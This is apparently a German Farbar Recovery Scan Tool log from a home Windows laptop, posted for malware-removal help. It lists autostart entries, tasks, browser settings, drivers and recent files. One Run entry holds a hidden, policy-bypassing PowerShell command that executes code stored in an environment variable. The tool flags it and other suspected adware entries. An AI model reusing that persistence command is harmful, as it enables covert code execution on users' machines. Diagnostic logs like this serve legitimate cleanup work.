HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [30870200 2020-09-22] (Piriform Software Ltd -> Piriform Software Ltd)
HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\...\Run: [] => [X]
HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\...\Run: [addfdabdfbbfef] => powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -Command "IEX([Environment]::GetEnvironmentVariable('addfdabdfbbfef', 'User'))" <==== ACHTUNG
HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\...\MountPoints2: {fd598295-7b76-11ea-8439-701ce7a3076d} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Ribbons.scr [151552 2019-03-19] (Microsoft Windows -> Microsoft Corporation)
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {167A0BEA-F118-42E8-A5CC-9F5F30956F4F} - System32\Tasks\Lenovo\BatteryGauge\BatteryGaugeMaintenance => C:\ProgramData\Lenovo\ImController\Plugins\LenovoBatteryGaugePackage\x64\BGHelper.exe [144312 2020-09-15] (Lenovo -> Lenovo Group Ltd.)
Task: {21CA7249-953D-45FA-9C91-A0B0016999C9} - System32\Tasks\Lenovo\Vantage\Lenovo.Vantage.ServiceMaintainance => %systemroot%\system32\sc.exe start LenovoVantageService
Task: {21F9DD1D-1DE5-4822-90C2-CB7C654899D7} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.)
Task: {27460DC2-0BB8-4BF6-92E4-BB3807EA5A28} - System32\Tasks\Mozilla\Firefox Default Browser Agent E7CF176E110C211B => C:\Program Files (x86)\Mozilla Firefox\default-browser-agent.exe [670928 2020-11-26] (Mozilla Corporation -> Mozilla Foundation)
Task: {320778BF-7987-4DD3-BFED-B10FF013247E} - System32\Tasks\Lenovo\ImController\Plugins\LenovoSystemUpdatePlugin_WeeklyTask => %windir%\System32\reg.exe add hklm\SOFTWARE\Lenovo\SystemUpdatePlugin\scheduler /v start /t reg_dword /d 1 /f /reg:32
Task: {3230C1BD-BA01-4E59-B5E6-6C160EE6B11C} - System32\Tasks\Nvbackend_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2397120 2016-06-14] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {3397E752-9B10-4AE9-843D-1C178B28AAD8} - System32\Tasks\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task => {3519154C-227E-47F3-9CC9-12C3F05817F1}
Task: {3B0252EF-8134-4EF7-AED9-28A8041A3BBC} - System32\Tasks\Connect => C:\Program Files (x86)\MAGIX\Connect\connect.exe [324680 2017-05-10] (MAGIX Software GmbH -> MAGIX Software GmbH)
Task: {3FE2E0CA-CA18-480B-AA84-51DA06B6469A} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\36fe37e6-69bf-4240-8789-54e3f941e0f1 => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81744 2020-09-24] (Lenovo -> Lenovo Group Ltd.)
Task: {4775AA5F-BC1B-4C04-B929-E339FEDF1CCF} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\76e81757-1352-4665-9649-fd3e6e13bd1d => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81744 2020-09-24] (Lenovo -> Lenovo Group Ltd.)
Task: {654DE0A9-101D-4CEE-BC0A-BD35A77FDFF2} - \Microsoft\Windows\UNP\RunCampaignManager -> Keine Datei <==== ACHTUNG
Task: {67C34546-4E40-44C6-B80F-F2DAA815FDF8} - System32\Tasks\App Explorer => C:\Users\seife\AppData\Local\Host App Service\Engine\HostAppServiceUpdater.exe <==== ACHTUNG
Task: {8D13E5D8-1B16-4F83-A6C1-3677D0DD865D} - System32\Tasks\CyberLink\Photo Master Gadget startup => C:\Program Files (x86)\Lenovo\Lenovo Photo Master\PhotoMasterWorker.exe [745240 2016-04-22] (CyberLink Corp. -> CyberLink Corp.)
Task: {9344E174-DE26-45AF-8C1C-20637B153BDC} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [25492152 2020-09-22] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {9EEC7ADA-6DF3-48EE-B137-41E34B3C6229} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\db1c6fd4-22d9-417d-947b-00e874fdc31c => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81744 2020-09-24] (Lenovo -> Lenovo Group Ltd.)
Task: {B465A685-368C-4D1D-A64A-34A6EEB78909} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [686384 2020-09-22] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {CECFD8CF-79F5-44F0-96C1-76B4AD73EE04} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_29_0_0_113_Plugin.exe [1362432 2018-04-07] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
Task: {DD4E7C7D-4A28-45FA-BF76-53E3C0448E4F} - System32\Tasks\Lenovo\ImController\Lenovo iM Controller Scheduled Maintenance => "%windir%\system32\sc.exe" START ImControllerService
Task: {E00BFAE8-C86E-4E1F-8C3C-A8E76C6723A9} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\b00c5975-d513-4b20-a54f-10c9a66bf2ef => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81744 2020-09-24] (Lenovo -> Lenovo Group Ltd.)
Task: {FBC58171-479E-4F18-B3A6-88178F164A0C} - System32\Tasks\Lenovo\ImController\Lenovo iM Controller Monitor => C:\WINDOWS\system32\ImController.InfInstaller.exe [62280 2020-09-24] (Lenovo -> Lenovo Group Ltd.)
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
Task: C:\WINDOWS\Tasks\Connect.job => C:\Program Files (x86)\MAGIX\Connect\connect.exe
==================== Internet (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{112decd3-61a3-4284-958c-e74aba2b288c}: [DhcpNameServer] 150.213.1.3
Tcpip\..\Interfaces\{d2c88b56-7aab-4dfc-b51d-99c7ec608a32}: [DhcpNameServer] 192.168.1.1
Edge:
======
DownloadDir: C:\Users\seife\Downloads
Edge Profile: C:\Users\seife\AppData\Local\Microsoft\Edge\User Data\Default [2020-11-28]
FireFox:
========
FF DefaultProfile: 9ymm54tg.default
FF ProfilePath: C:\Users\seife\AppData\Roaming\Mozilla\Firefox\Profiles\9ymm54tg.default [2020-11-28]
FF Homepage: Mozilla\Firefox\Profiles\9ymm54tg.default -> www.google.com/
FF Notifications: Mozilla\Firefox\Profiles\9ymm54tg.default -> hxxps://book.lufthansa.com; hxxps://web.whatsapp.com; hxxps://iceportal.de
FF Extension: (Avira Browserschutz) - C:\Users\seife\AppData\Roaming\Mozilla\Firefox\Profiles\9ymm54tg.default\Extensions\abs@avira.com.xpi [2020-10-17]
FF Extension: (Shoop Cashback-Assistent: Cashback&Gutscheine) - C:\Users\seife\AppData\Roaming\Mozilla\Firefox\Profiles\9ymm54tg.default\Extensions\lisa@qipu.de.xpi [2020-11-26]
FF Extension: (PAYBACK Internet Assistent) - C:\Users\seife\AppData\Roaming\Mozilla\Firefox\Profiles\9ymm54tg.default\Extensions\toolbar-ff@payback.de-sh.xpi [2020-11-14] [UpdateUrl:hxxps://www.payback.de/resources/content/site-pia/update/1/ffsh/json]
FF SearchPlugin: C:\Users\seife\AppData\Roaming\Mozilla\Firefox\Profiles\9ymm54tg.default\searchplugins\bing-lavasoft.xml [2017-02-25]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_29_0_0_113.dll [2018-04-07] (Adobe Systems Incorporated -> )
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_29_0_0_113.dll [2018-04-07] (Adobe Systems Incorporated -> )
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2017-06-19] (NVIDIA Corporation PE Sign v2016 -> NVIDIA Corporation) [Datei ist nicht signiert]
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2017-06-19] (NVIDIA Corporation PE Sign v2016 -> NVIDIA Corporation) [Datei ist nicht signiert]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-11-19] (Adobe Inc. -> Adobe Systems Inc.)
Chrome:
=======
CHR Profile: C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default [2020-11-26]
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxps://www.bing.com/?PC=JV01"
CHR DefaultSearchURL: Default -> hxxps://www.bing.com/search?FORM=JVSBRD&PC=JV02&q={searchTerms}
CHR DefaultSearchKeyword: Default -> bing.com
CHR DefaultSuggestURL: Default -> hxxps://www.bing.com/osjson.aspx?query={searchTerms}
CHR Extension: (Präsentationen) - C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-04-21]
CHR Extension: (Docs) - C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-04-21]
CHR Extension: (Google Drive) - C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-06-11]
CHR Extension: (YouTube) - C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-06-11]
CHR Extension: (Tabellen) - C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-04-21]
CHR Extension: (Avira Browserschutz) - C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk [2019-04-21]
CHR Extension: (Google Docs Offline) - C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2019-04-21]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-04-21]
CHR Extension: (Google Mail) - C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-06-11]
CHR Extension: (Chrome Media Router) - C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-04-21]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk]
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk]
==================== Dienste (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)
R2 CCSDK; C:\Program Files (x86)\Lenovo\CCSDK\CCSDK.exe [666608 2016-03-22] (LENOVO -> Lenovo)
R2 CxUtilSvc; C:\Program Files\Conexant\SAII\CxUtilSvc.exe [132096 2016-05-12] (Conexant Systems, Inc.) [Datei ist nicht signiert]
R2 Dolby DAX2 API Service; C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe [194048 2017-03-07] (Dolby Laboratories, Inc. -> Dolby Laboratories, Inc.)
R2 GDCAgent; C:\Program Files (x86)\Lenovo\GDCAgentSetupRed\GDCAgent.exe [1210352 2016-03-22] (LENOVO -> Lenovo)
R2 HuaweiHiSuiteService64.exe; C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe [190784 2019-08-19] (Huawei Technologies Co., Ltd. -> ) [Datei ist nicht signiert]
R2 ImControllerService; C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81744 2020-09-24] (Lenovo -> Lenovo Group Ltd.)
R2 LenovoVantageService; C:\Program Files (x86)\Lenovo\VantageService\3.3.115.0\LenovoVantageService.exe [18360 2020-07-09] (Lenovo -> Lenovo Group Ltd.)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [7269976 2020-11-26] (Malwarebytes Inc -> Malwarebytes)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [4098056 2019-03-19] (Microsoft Corporation -> Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [113992 2019-03-19] (Microsoft Corporation -> Microsoft Corporation)
===================== Treiber (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [153312 2020-11-26] (Malwarebytes Corporation -> Malwarebytes)
S3 ew_usbccgpfilter; C:\WINDOWS\System32\drivers\ew_usbccgpfilter.sys [18944 2019-08-19] (Microsoft Windows Hardware Compatibility Publisher -> Huawei Technologies Co., Ltd.)
R2 MBAMChameleon; C:\WINDOWS\System32\Drivers\MbamChameleon.sys [220160 2020-11-26] (Malwarebytes Inc -> Malwarebytes)
S0 MbamElam; C:\WINDOWS\System32\DRIVERS\MbamElam.sys [19912 2020-11-26] (Microsoft Windows Early Launch Anti-Malware Publisher -> Malwarebytes)
R3 MBAMFarflt; C:\WINDOWS\System32\DRIVERS\farflt.sys [197792 2020-11-28] (Malwarebytes Inc -> Malwarebytes)
R3 MBAMProtection; C:\WINDOWS\system32\DRIVERS\mbam.sys [77496 2020-11-28] (Malwarebytes Inc -> Malwarebytes)
R0 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [248968 2020-11-26] (Malwarebytes Inc -> Malwarebytes)
R3 MBAMWebProtection; C:\WINDOWS\system32\DRIVERS\mwac.sys [138904 2020-11-28] (Malwarebytes Inc -> Malwarebytes)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [46472 2019-03-19] (Microsoft Windows Early Launch Anti-Malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [333784 2019-03-19] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [62432 2019-03-19] (Microsoft Windows -> Microsoft Corporation)
S3 wsvd; C:\WINDOWS\system32\DRIVERS\wsvd.sys [102376 2012-06-13] (CyberLink -> "CyberLink)
==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2020-11-28 13:17 - 2020-11-28 13:17 - 000021931 _____ C:\Users\seife\Desktop\FRST.txt
2020-11-28 13:16 - 2020-11-28 13:17 - 000000000 ____D C:\FRST
2020-11-28 13:15 - 2020-11-28 13:15 - 002290176 _____ (Farbar) C:\Users\seife\Desktop\FRST64.exe
2020-11-28 13:07 - 2020-11-28 13:07 - 000197792 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
2020-11-28 13:07 - 2020-11-28 13:07 - 000138904 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
2020-11-28 13:07 - 2020-11-28 13:07 - 000077496 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2020-11-28 13:04 - 2020-11-28 13:04 - 000000080 ___SH C:\bootTel.dat
2020-11-28 12:35 - 2020-11-28 12:47 - 000000000 ____D C:\Users\seife\Doctor Web
2020-11-28 12:35 - 2020-11-28 12:35 - 000000000 ____D C:\ProgramData\Doctor Web
2020-11-28 12:32 - 2020-11-28 12:34 - 234730072 _____ C:\Users\seife\Downloads\6dqs0oee.exe
2020-11-26 17:29 - 2020-11-26 17:29 - 000248968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamswissarmy.sys
2020-11-26 17:29 - 2020-11-26 17:29 - 000220160 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamChameleon.sys
2020-11-26 17:29 - 2020-11-26 17:29 - 000153312 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbae64.sys
2020-11-26 17:29 - 2020-11-26 17:29 - 000019912 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamElam.sys
2020-11-26 17:29 - 2020-11-26 17:29 - 000002040 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes.lnk
2020-11-26 17:29 - 2020-11-26 17:29 - 000002028 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2020-11-26 17:29 - 2020-11-26 17:29 - 000002028 _____ C:\ProgramData\Desktop\Malwarebytes.lnk
2020-11-26 17:29 - 2020-11-26 17:29 - 000000000 ____D C:\Users\seife\AppData\Local\mbam
2020-11-26 17:29 - 2020-11-26 17:29 - 000000000 ____D C:\ProgramData\Malwarebytes
2020-11-26 17:28 - 2020-11-26 17:28 - 000000000 ____D C:\Program Files\Malwarebytes
2020-11-26 17:25 - 2020-11-26 17:25 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth9.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth8.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth7.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth6.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth5.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth4.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth3.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth2.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth12.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth11.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth10.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth1.bin
2020-11-22 11:17 - 2020-11-22 11:17 - 001841152 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2020-11-22 11:17 - 2020-11-22 11:17 - 001101312 _____ C:\WINDOWS\SysWOW64\TextInputMethodFormatter.dll
2020-11-22 11:16 - 2020-11-22 11:16 - 000200704 _____ C:\WINDOWS\system32\IHDS.dll
2020-11-22 11:16 - 2020-11-22 11:16 - 000164864 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
2020-11-18 10:57 - 2020-10-06 01:13 - 000835472 _____ (Adobe) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2020-11-18 10:57 - 2020-10-06 01:13 - 000179608 _____ (Adobe) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2020-11-14 17:28 - 2020-11-27 17:29 - 000055296 _____ C:\Users\seife\AppData\Roaming\cookies.sqlite
2020-11-14 16:50 - 2020-11-14 17:39 - 000000000 ____D C:\Users\seife\AppData\Roaming\.minecraft
==================== Ein Monat (geänderte) ==================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2020-11-28 13:16 - 2019-03-19 05:50 - 000000000 ____D C:\WINDOWS\INF
2020-11-28 13:11 - 2019-10-27 13:52 - 001723292 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2020-11-28 13:11 - 2019-03-19 13:16 - 000745142 _____ C:\WINDOWS\system32\perfh007.dat
2020-11-28 13:11 - 2019-03-19 13:16 - 000150430 _____ C:\WINDOWS\system32\perfc007.dat
2020-11-28 13:10 - 2019-02-03 08:57 - 000000000 ____D C:\ProgramData\Mozilla
2020-11-28 13:09 - 2017-02-25 16:39 - 000000000 ____D C:\Users\seife\AppData\LocalLow\Mozilla
2020-11-28 13:09 - 2017-02-25 15:17 - 000000000 ___RD C:\Users\seife\OneDrive
2020-11-28 13:07 - 2019-10-27 13:53 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2020-11-28 13:07 - 2019-03-19 05:52 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2020-11-28 13:07 - 2017-02-25 15:15 - 000000000 __SHD C:\Users\seife\IntelGraphicsProfiles
2020-11-28 13:07 - 2017-01-25 11:30 - 000000000 ____D C:\ProgramData\NVIDIA
2020-11-28 13:01 - 2019-03-19 05:37 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2020-11-28 13:00 - 2019-10-27 13:46 - 000000000 ____D C:\Users\seife
2020-11-28 12:57 - 2019-10-27 13:41 - 000595096 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2020-11-28 12:57 - 2019-10-27 13:41 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2020-11-28 12:57 - 2017-02-26 11:43 - 000000000 ____D C:\Program Files (x86)\Avira
2020-11-28 12:48 - 2017-02-26 13:06 - 000000000 ____D C:\Program Files (x86)\Google
2020-11-28 12:30 - 2017-02-26 11:43 - 000000000 ____D C:\ProgramData\Avira
2020-11-28 12:29 - 2017-01-25 11:20 - 000000000 ____D C:\ProgramData\Package Cache
2020-11-27 17:26 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\AppReadiness
2020-11-27 17:24 - 2017-03-19 13:58 - 000000000 ____D C:\Users\seife\AppData\Local\CrashDumps
2020-11-26 20:06 - 2019-10-27 13:53 - 000004210 _____ C:\WINDOWS\system32\Tasks\CCleaner Update
2020-11-26 20:03 - 2020-10-17 10:12 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2020-11-26 20:02 - 2017-05-22 11:28 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GoodGame
2020-11-26 20:02 - 2017-02-25 16:38 - 000001239 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2020-11-26 20:02 - 2017-02-25 16:38 - 000001227 _____ C:\Users\Public\Desktop\Firefox.lnk
2020-11-26 20:02 - 2017-02-25 16:38 - 000001227 _____ C:\ProgramData\Desktop\Firefox.lnk
2020-11-26 18:44 - 2019-03-19 05:52 - 000000000 ___HD C:\Program Files\WindowsApps
2020-11-26 18:18 - 2020-09-24 08:24 - 000002443 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2020-11-26 18:18 - 2020-09-24 08:24 - 000002281 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2020-11-26 18:18 - 2020-09-24 08:24 - 000002281 _____ C:\ProgramData\Desktop\Microsoft Edge.lnk
2020-11-26 17:30 - 2019-10-27 13:53 - 000004562 _____ C:\WINDOWS\system32\Tasks\Adobe Acrobat Update Task
2020-11-26 17:30 - 2017-02-26 13:06 - 000002143 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2020-11-26 17:29 - 2019-03-19 05:52 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2020-11-26 17:22 - 2018-12-16 01:08 - 000000000 ____D C:\Users\seife\AppData\Local\D3DSCache
2020-11-26 17:15 - 2017-04-06 20:47 - 000000000 ___RD C:\Users\seife\3D Objects
2020-11-26 17:15 - 2016-07-29 18:27 - 000000000 __RHD C:\Users\Public\AccountPictures
2020-11-22 12:12 - 2019-03-19 05:52 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2020-11-22 12:12 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\TextInput
2020-11-22 12:12 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\SysWOW64\setup
2020-11-22 12:12 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\SystemResources
2020-11-22 12:12 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\setup
2020-11-22 12:12 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\oobe
2020-11-22 12:12 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\migwiz
2020-11-22 12:12 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\ShellExperiences
2020-11-22 12:12 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2020-11-22 12:12 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\bcastdvr
2020-11-22 11:32 - 2017-08-04 23:14 - 000000000 ____D C:\Users\seife\AppData\Local\ElevatedDiagnostics
2020-11-22 11:22 - 2020-10-17 10:36 - 000000000 ____D C:\Program Files\Microsoft Update Health Tools
2020-11-22 11:22 - 2019-03-19 05:37 - 000000000 ____D C:\WINDOWS\CbsTemp
2020-11-22 11:16 - 2019-10-27 13:44 - 002876928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ___RD C:\WINDOWS\PrintDialog
2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\WinMetadata
2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\Sysprep
2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\es-MX
2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\Dism
2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\appraiser
2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\Provisioning
2020-11-18 09:16 - 2017-02-26 14:44 - 133736600 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2020-11-18 09:16 - 2017-02-26 14:44 - 000000000 ____D C:\WINDOWS\system32\MRT
2020-11-14 18:17 - 2017-02-25 16:38 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-11-14 16:43 - 2019-10-27 13:53 - 000003356 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2235809649-4173297830-2174137979-1001
2020-11-14 16:43 - 2019-10-27 13:46 - 000002390 _____ C:\Users\seife\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2020-11-14 16:42 - 2020-09-24 08:23 - 000003700 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2020-11-14 16:42 - 2020-09-24 08:23 - 000003576 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2020-11-12 11:00 - 2020-10-17 10:36 - 000907064 _____ (Microsoft Corporation) C:\WINDOWS\system32\sedplugins.dll
2020-11-12 10:59 - 2020-10-17 10:36 - 000436536 _____ (Microsoft Corporation) C:\WINDOWS\system32\QualityUpdateAssistant.dll
==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ========
2020-11-14 17:28 - 2020-11-27 17:29 - 000055296 _____ () C:\Users\seife\AppData\Roaming\cookies.sqlite
==================== SigCheck ============================
(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
==================== Ende von FRST.txt ======================
Code:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 28-11-2020
